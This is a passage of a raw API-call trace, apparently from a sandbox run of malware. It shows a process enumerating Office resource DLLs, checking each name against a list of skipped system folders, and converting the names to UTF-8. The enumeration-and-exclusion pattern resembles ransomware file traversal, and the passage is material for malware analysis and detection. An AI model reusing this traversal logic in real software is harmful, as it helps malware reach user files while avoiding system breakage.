(lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.787] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.787] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0126.787] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0126.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0126.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d920, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0126.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0126.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dde8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0126.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244ab0 [0126.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.787] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffd6924a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd6924a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd6924a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.787] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0126.787] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0126.787] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0126.787] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0126.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0126.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0126.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0126.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0126.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dff8 [0126.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244ab0 | out: hHeap=0x1e0000) returned 1 [0126.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.788] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x863456d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x863456d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ba90, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MI93CC~1.DLL")) returned 1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0126.788] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0126.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0126.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20d728, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0126.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0126.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dde8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0126.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0126.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0126.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.789] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8680a1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x8680a1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8680a1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MIE9BA~1.DLL")) returned 1 [0126.789] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0126.789] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0126.789] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0126.789] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0126.789] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0126.789] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0126.789] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0126.789] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.789] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0126.789] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0126.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0126.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20d920, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0126.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0126.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20d698, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0126.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dcb0 [0126.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0126.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.790] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22a9f7a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22a9f7a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22a9f7a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c050, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0126.790] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0126.790] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0126.790] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0126.790] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0126.790] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0126.790] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0126.790] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0126.790] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.790] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0126.790] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0126.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0126.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0126.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0126.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0126.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247b80 [0126.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0126.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.790] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6b15891, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b15891, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b15891, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x47068, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MIB24E~1.DLL")) returned 1 [0126.790] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0126.790] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0126.790] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0126.790] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0126.790] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0126.790] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0126.790] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0126.790] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.790] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0126.791] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0126.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d698, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0126.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dde8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0126.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e688 [0126.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0126.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.791] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18157e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18157e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18157e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ee8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0126.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0126.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0126.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0126.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0126.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0126.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0126.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0126.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0126.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0126.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0126.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dba8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0126.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0126.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 